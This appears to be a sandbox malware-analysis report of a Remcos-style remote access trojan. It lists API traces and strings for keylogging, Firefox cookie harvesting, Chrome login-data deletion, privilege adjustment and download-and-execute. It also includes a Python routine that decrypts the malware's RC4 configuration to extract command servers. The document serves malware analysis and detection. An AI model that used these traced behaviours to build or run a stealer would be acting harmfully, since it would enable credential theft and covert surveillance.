                                                                                          • FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 0040C3D6
                                                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 0040C4A9
                                                                                          • FindClose.KERNEL32(00000000), ref: 0040C4B8
                                                                                          • FindClose.KERNEL32(00000000), ref: 0040C4E3
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                           • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Find$CloseFile$FirstNext
                                                                                          • String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                                                          • API String ID: 1164774033-405221262
                                                                                          • Opcode ID: e90d06a8ec93e69e400289d3d5a4f788ee45a56a67685538a4b9ff5dd8d84a81
                                                                                          • Instruction ID: 33618048715e6b2d4a7b39963b1e19558724686ef99070a322097c87c0ca4c0c
                                                                                          • Opcode Fuzzy Hash: e90d06a8ec93e69e400289d3d5a4f788ee45a56a67685538a4b9ff5dd8d84a81
                                                                                          • Instruction Fuzzy Hash: 59313E31500219AACB14E761DC9A9EE7778AF50719F10057FF106B21E2EF7C9946CA4D
                                                                                          APIs
                                                                                          • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C37D
                                                                                          • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3AD
                                                                                          • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C41F
                                                                                          • DeleteFileW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C42C
                                                                                            • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C402
                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C44D
                                                                                          • FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C463
                                                                                          • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C46A
                                                                                          • FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C473
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                           • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                                                                          • String ID:
                                                                                          • API String ID: 2341273852-0
                                                                                          • Opcode ID: 74fc921fbbcb6c35e60b9a8f4f047a03f237c0767a03969ab094381de9c75e57
                                                                                          • Instruction ID: 53b23dfad01ba0d5beec27b7c27070a1caf437d6ccbc5233b8522822963bc02e
                                                                                          • Opcode Fuzzy Hash: 74fc921fbbcb6c35e60b9a8f4f047a03f237c0767a03969ab094381de9c75e57
                                                                                          • Instruction Fuzzy Hash: 4A31807284431CAADB24E761DC89EEB736CAF09305F0405FBF559D2051EB3DDAC98A58
                                                                                          APIs
                                                                                          • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 0040A30E
                                                                                          • SetWindowsHookExA.USER32(0000000D,0040A2DF,00000000), ref: 0040A31C
                                                                                          • GetLastError.KERNEL32 ref: 0040A328
                                                                                            • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                          • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040A376
                                                                                          • TranslateMessage.USER32(?), ref: 0040A385
                                                                                          • DispatchMessageA.USER32(?), ref: 0040A390
                                                                                          Strings
                                                                                          • Keylogger initialization failure: error , xrefs: 0040A33C
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                                                                          • String ID: Keylogger initialization failure: error
                                                                                          • API String ID: 3219506041-952744263
                                                                                          • Opcode ID: fc27e46cae71e48e676fe4f224a22039b8de20a8564221e2638cded3f863b4df
                                                                                          • Instruction ID: 8743f2250fb8cae6a99ae5fb3d4b34fe2baf279f6720e4878f05ffc9670b3ffc
                                                                                          • Opcode Fuzzy Hash: fc27e46cae71e48e676fe4f224a22039b8de20a8564221e2638cded3f863b4df
                                                                                          • Instruction Fuzzy Hash: 6011BF31510301EBC710BB769D0986B77ACEA95715B20097EFC82E22D1EB34C910CBAA
                                                                                          APIs
                                                                                          • GetForegroundWindow.USER32 ref: 0040A451
                                                                                          • GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A45D
                                                                                          • GetKeyboardLayout.USER32(00000000), ref: 0040A464
                                                                                          • GetKeyState.USER32(00000010), ref: 0040A46E
                                                                                          • GetKeyboardState.USER32(?), ref: 0040A479
                                                                                          • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 0040A49C
                                                                                          • ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 0040A4FC
                                                                                          • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 0040A535
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                                                                                          • String ID:
                                                                                          • API String ID: 1888522110-0
                                                                                          • Opcode ID: 1fbef96bbf5188aadc2f193688702ae07512c2e2bc484e71aa5862d9cec23228
                                                                                          • Instruction ID: fd17a64e9e4f7f825196359ceba3421c6f582a70c0a4c9d277f8a97da3dc7bda
                                                                                          • Opcode Fuzzy Hash: 1fbef96bbf5188aadc2f193688702ae07512c2e2bc484e71aa5862d9cec23228
                                                                                          • Instruction Fuzzy Hash: 1E316D72504308BFD700DF90DC45F9B7BECBB88744F00083AB645D61A0D7B5E9498BA6
                                                                                          APIs
                                                                                          • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004140D8
                                                                                          • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004140E4
                                                                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                          • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 004142A5
                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 004142AC
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AddressCloseCreateLibraryLoadProcsend
                                                                                          • String ID: SHDeleteKeyW$Shlwapi.dll
                                                                                          • API String ID: 2127411465-314212984
                                                                                          • Opcode ID: 0f6b8dc58b31b4decc9496a35d1780b66657e1a1c5e00cff670ac627aeb7fae8
                                                                                          • Instruction ID: 51cedef5a77654bf04fe1bae55708f30d4330cefe0c145b830acf249c6506b6e
                                                                                          • Opcode Fuzzy Hash: 0f6b8dc58b31b4decc9496a35d1780b66657e1a1c5e00cff670ac627aeb7fae8
                                                                                          • Instruction Fuzzy Hash: 16B1F671A0430066CA14FB76DC579AF36A85F91788F40053FB906771E2EE7D8A48C6DA
                                                                                          APIs
                                                                                            • Part of subcall function 0041798D: GetCurrentProcess.KERNEL32(00000028,?), ref: 0041799A
                                                                                            • Part of subcall function 0041798D: OpenProcessToken.ADVAPI32(00000000), ref: 004179A1
                                                                                            • Part of subcall function 0041798D: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004179B3
                                                                                            • Part of subcall function 0041798D: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 004179D2
                                                                                            • Part of subcall function 0041798D: GetLastError.KERNEL32 ref: 004179D8
                                                                                          • ExitWindowsEx.USER32(00000000,00000001), ref: 00416891
                                                                                          • LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 004168A6
                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 004168AD
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                                                                          • String ID: !D@$PowrProf.dll$SetSuspendState
                                                                                          • API String ID: 1589313981-2876530381
                                                                                          • Opcode ID: 558271a35a8bdba10085a696c11b9306f9ed655432d6f63f913a34884c8f5c77
                                                                                          • Instruction ID: 272f3f60014ab8f8f2fa2781f50e1ac7d9ab3f628c5d0f86ef79d7992e461550
                                                                                          • Opcode Fuzzy Hash: 558271a35a8bdba10085a696c11b9306f9ed655432d6f63f913a34884c8f5c77
                                                                                          • Instruction Fuzzy Hash: D821B17060430166CA14FBB28856ABF36599F41388F41087FB501671D2EF3DD845C76E
                                                                                          APIs
                                                                                          • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040BA89
                                                                                          • GetLastError.KERNEL32 ref: 0040BA93
                                                                                          Strings
                                                                                          • [Chrome StoredLogins found, cleared!], xrefs: 0040BAB9
                                                                                          • [Chrome StoredLogins not found], xrefs: 0040BAAD
                                                                                          • UserProfile, xrefs: 0040BA59
                                                                                          • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040BA54
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: DeleteErrorFileLast
                                                                                          • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                                                                          • API String ID: 2018770650-1062637481
                                                                                          • Opcode ID: 0e12c434a704d568d93f0e9ae73d02a011f2f49309dc381e150468c0f0ecafbd
                                                                                          • Instruction ID: 0532e36a1aab116e50a9f1d1704ee325f44086adb43c50cfffb7bf5285f9a594
                                                                                          • Opcode Fuzzy Hash: 0e12c434a704d568d93f0e9ae73d02a011f2f49309dc381e150468c0f0ecafbd
                                                                                          • Instruction Fuzzy Hash: 76018F61A402056ACB04B7B6DC5B9BE7724A921704B50057FF806722D2FE7D49098BDE
                                                                                          APIs
                                                                                          • GetCurrentProcess.KERNEL32(00000028,?), ref: 0041799A
                                                                                          • OpenProcessToken.ADVAPI32(00000000), ref: 004179A1
                                                                                          • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004179B3
                                                                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 004179D2
                                                                                          • GetLastError.KERNEL32 ref: 004179D8
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                                                                          • String ID: SeShutdownPrivilege
                                                                                          • API String ID: 3534403312-3733053543
                                                                                          • Opcode ID: d49d9c43419eaec1bfbdc5cb8a800583ef6843b46de48ba71f06d4aa9fea9060
                                                                                          • Instruction ID: 35ac2027e355ce869dd6e937a138cd84cb59798e299a7bc9dfe05b1c572390d3
                                                                                          • Opcode Fuzzy Hash: d49d9c43419eaec1bfbdc5cb8a800583ef6843b46de48ba71f06d4aa9fea9060
                                                                                          • Instruction Fuzzy Hash: 38F03A71802229FBDB10ABA1EC4DAEF7FBCEF05612F100465B909A1152D7348E04CBB5
                                                                                          APIs
                                                                                          • __EH_prolog.LIBCMT ref: 00409293
                                                                                            • Part of subcall function 004048C8: connect.WS2_32(FFFFFFFF,?,?), ref: 004048E0
                                                                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 0040932F
                                                                                          • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 0040938D
                                                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 004093E5
                                                                                          • FindClose.KERNEL32(00000000), ref: 004093FC
                                                                                            • Part of subcall function 00404E26: WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E38
                                                                                            • Part of subcall function 00404E26: SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E43
                                                                                            • Part of subcall function 00404E26: CloseHandle.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E4C
                                                                                          • FindClose.KERNEL32(00000000), ref: 004095F4
                                                                                            • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(00000000,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                                                                                            • Part of subcall function 00404AA1: SetEvent.KERNEL32(00000000,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Find$Close$EventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsend
                                                                                          • String ID:
                                                                                          • API String ID: 1824512719-0
                                                                                          • Opcode ID: cd608265bd1be8b07682067f0b9d09a1daa7a366b7b1d0b2306626e8246afaf9
                                                                                          • Instruction ID: 89df7f8b75d3b77417eb58d09b4f39b7dfb13bde992cfd9524fc7595df83f5be
                                                                                          • Opcode Fuzzy Hash: cd608265bd1be8b07682067f0b9d09a1daa7a366b7b1d0b2306626e8246afaf9
                                                                                          • Instruction Fuzzy Hash: 34B19D32900109AACB14EBA1DD92AEDB379AF44314F50417FF506B60E2EF785F49CB59
                                                                                          APIs
                                                                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,0041A731,00000000), ref: 0041AAE4
                                                                                          • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,0041A731,00000000), ref: 0041AAF9
                                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB06
                                                                                          • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,0041A731,00000000), ref: 0041AB11
                                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB23
                                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB26
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Service$CloseHandle$Open$ManagerStart
                                                                                          • String ID:
                                                                                          • API String ID: 276877138-0
                                                                                          • Opcode ID: e30b05f20183ba3613960b636cce26fc80956d1a3587d8fe59d4f8762fcd24c9
                                                                                          • Instruction ID: 14dbf03deabb1432b93a26d2ddf90514dbbc411f15d31c7908333a88c2a5d316
                                                                                          • Opcode Fuzzy Hash: e30b05f20183ba3613960b636cce26fc80956d1a3587d8fe59d4f8762fcd24c9
                                                                                          • Instruction Fuzzy Hash: FEF0E971141225AFD2115B209C88DFF276CDF85B66B00082AF901921919B68CC45E579
                                                                                          APIs
                                                                                          • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002), ref: 00452555
                                                                                          • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002), ref: 0045257E
                                                                                          • GetACP.KERNEL32 ref: 00452593
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: InfoLocale
                                                                                          • String ID: ACP$OCP
                                                                                          • API String ID: 2299586839-711371036
                                                                                          • Opcode ID: 61c68c86ee519c97ea86d50e82dd2762e668b1fdc7e44e8e256cfbf4b452970f
                                                                                          • Instruction ID: 097c3b5166b2d36aca1cb621bb06e922528e2ea4561953c90108b9915aa2a338
                                                                                          • Opcode Fuzzy Hash: 61c68c86ee519c97ea86d50e82dd2762e668b1fdc7e44e8e256cfbf4b452970f
                                                                                          • Instruction Fuzzy Hash: 7E21F932600108B6D734CF14CA10A9B73A6EB16B53B564467ED09D7312F7B6DD44C398
APIs
• FindResourceA.KERNEL32(SETTINGS,0000000A,00000000), ref: 0041B54A
• LoadResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B55E
• LockResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B565
• SizeofResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B574
Memory Dump Source
• Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
• API ID: Resource$FindLoadLockSizeof
• String ID: SETTINGS
• API String ID: 3473537107-594951305
• Opcode ID: a45aaf07b9511fe1cfb91064365b640b81f442c86eb18a115f7d7951e0b61df2
• Instruction ID: d04f7a3eece584ab18b37ce022e38df3785cd6d6757b7dd0dc659012c7d5cbc3
• Opcode Fuzzy Hash: a45aaf07b9511fe1cfb91064365b640b81f442c86eb18a115f7d7951e0b61df2
• Instruction Fuzzy Hash: 8EE01A76600B22EBEB211BB1AC4CD863E29F7C97637140075F90586231CB798840DA98
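The FindResourceA / LoadResource / LockResource / SizeofResource chain above reads an RT_RCDATA resource (type 0x0A) named SETTINGS, which is where Remcos keeps its configuration. The Python below is an added example, not code from this report or from Remcos: it assumes the SETTINGS blob has already been dumped from the PE with any resource tool and parses it under the layout commonly documented for recent Remcos builds (one key-length byte, the RC4 key, then RC4 ciphertext whose plaintext fields are separated by the byte string `|\x1e\x1e\x1f|`). That layout, the field order, the `;`-separated `host:port:password` C2 entries and every sample value are assumptions; this report only shows that the sample loads the resource, not its internal format.

```python
"""Parse a Remcos-style SETTINGS blob and split the decrypted config fields.

Added example, not from this report or from Remcos. The blob layout, field
delimiter and C2 entry format below are the commonly documented Remcos layout,
assumed here; the report itself only shows FindResourceA("SETTINGS", RT_RCDATA).
"""
from __future__ import annotations

RT_RCDATA = 10                   # resource type 0x0A seen in the FindResourceA call
FIELD_SEP = b"|\x1e\x1e\x1f|"   # assumed Remcos field delimiter (not from the report)


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA). Symmetric, so it both encrypts and decrypts."""
    if not key:
        raise ValueError("empty RC4 key")
    s = list(range(256))
    j = 0
    for i in range(256):                       # key-scheduling algorithm
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:                          # pseudo-random generation algorithm
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def build_settings_blob(key: bytes, fields: list[bytes]) -> bytes:
    """Build a SETTINGS-style blob for testing. Constructed data, not taken from the sample."""
    if not 1 <= len(key) <= 255:
        raise ValueError("key length must fit in one byte")
    return bytes([len(key)]) + key + rc4(key, FIELD_SEP.join(fields))


def parse_settings_blob(blob: bytes) -> dict:
    """Split a SETTINGS blob into RC4 key, decrypted plaintext and field list.

    A zero key length or a blob shorter than the key-length byte claims means the
    data is not in the assumed layout (e.g. a different Remcos version), so fail
    loudly instead of decrypting garbage.
    """
    if len(blob) < 2:
        raise ValueError("blob too short")
    key_len = blob[0]
    if key_len == 0 or len(blob) < 1 + key_len:
        raise ValueError("bad key length %d for %d-byte blob" % (key_len, len(blob)))
    key = blob[1:1 + key_len]
    plaintext = rc4(key, blob[1 + key_len:])
    return {"key": key, "plaintext": plaintext, "fields": plaintext.split(FIELD_SEP)}


def c2_hosts(fields: list[bytes]) -> list[str]:
    """Return the C2 entries from field 0, assumed to hold 'host:port:password'
    entries separated by ';' (field index and format are assumptions)."""
    if not fields:
        return []
    return [e.decode("latin-1") for e in fields[0].split(b";") if e]


# Constructed sample input: every value here is made up for the example.
SAMPLE_KEY = b"example-rc4-key"
SAMPLE_FIELDS = [
    b"c2.example.invalid:2404:pass;backup.example.invalid:2404:pass",
    b"Remcos-Example",
    b"1",
    b"5.1.3 Pro",
]
SAMPLE_BLOB = build_settings_blob(SAMPLE_KEY, SAMPLE_FIELDS)

if __name__ == "__main__":
    cfg = parse_settings_blob(SAMPLE_BLOB)
    print("key:", cfg["key"])
    for host in c2_hosts(cfg["fields"]):
        print("c2:", host)
```

On a real dump, replace `SAMPLE_BLOB` with the raw bytes of the SETTINGS resource; if `parse_settings_blob` raises, the build uses a layout other than the one assumed here and the decrypted fields should not be trusted.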
APIs
• __EH_prolog.LIBCMT ref: 004096A5
• FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 0040971D
• FindNextFileW.KERNEL32(00000000,?), ref: 00409746
• FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 0040975D
Memory Dump Source
• Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
• API ID: Find$File$CloseFirstH_prologNext
• String ID:
• API String ID: 1157919129-0
• Opcode ID: 0d9b42017be71501d33dbc29ad810fbbdc579c8f6a897c623fd1351d11184fdc
• Instruction ID: 8e52766585a78a9bd0f7e398a9017c7fe376444e683812dd136b20495b515571
• Opcode Fuzzy Hash: 0d9b42017be71501d33dbc29ad810fbbdc579c8f6a897c623fd1351d11184fdc
• Instruction Fuzzy Hash: 7F814C328001099BCB15EBA2DC969EDB378AF14318F10417FE506B71E2EF789E49CB58
APIs
  • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
  • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
  • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
  • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
• GetUserDefaultLCID.KERNEL32 ref: 0045279C
• IsValidCodePage.KERNEL32(00000000), ref: 004527F7
• IsValidLocale.KERNEL32(?,00000001), ref: 00452806
• GetLocaleInfoW.KERNEL32(?,00001001,?,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 0045284E
• GetLocaleInfoW.KERNEL32(?,00001002,?,00000040), ref: 0045286D
Memory Dump Source
• Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
• API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
• String ID:
• API String ID: 745075371-0
• Opcode ID: d20e60e436924f937cd003670a139ed53a354482d02232a94d44678fcfb69b99
• Instruction ID: 3c84011e7dbdf7a6f9673bc5a23f9f2f22d5020eb6794df094384b3d0215d6fb
• Opcode Fuzzy Hash: d20e60e436924f937cd003670a139ed53a354482d02232a94d44678fcfb69b99
• Instruction Fuzzy Hash: 9B518571900205ABDB10DFA5CD45ABF77B8EF0A702F04046BED14E7292E7B89948CB69
APIs
• __EH_prolog.LIBCMT ref: 0040884C
• FindFirstFileW.KERNEL32(00000000,?,00466618,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408905
• __CxxThrowException@8.LIBVCRUNTIME ref: 0040892D
• FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040893A
• FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408A50
Memory Dump Source
• Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
• API ID: Find$File$CloseException@8FirstH_prologNextThrow
• String ID:
• API String ID: 1771804793-0
• Opcode ID: 2aff72510e3da79c4ec0127435383929a3d65dfb18998d25a11cc0f49d42b15d
• Instruction ID: 0d5560aa06bbfb8d15084ed76e809f646cede1ce68103026aeaac9ba950e1e68
• Opcode Fuzzy Hash: 2aff72510e3da79c4ec0127435383929a3d65dfb18998d25a11cc0f49d42b15d
• Instruction Fuzzy Hash: 9D517F72900209AACB04FB65DD569ED7778AF10308F50417FB906B71E2EF389B49CB89
APIs
• ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406FF7
• URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 004070DB
Memory Dump Source
• Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
• API ID: DownloadExecuteFileShell
• String ID: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe$open
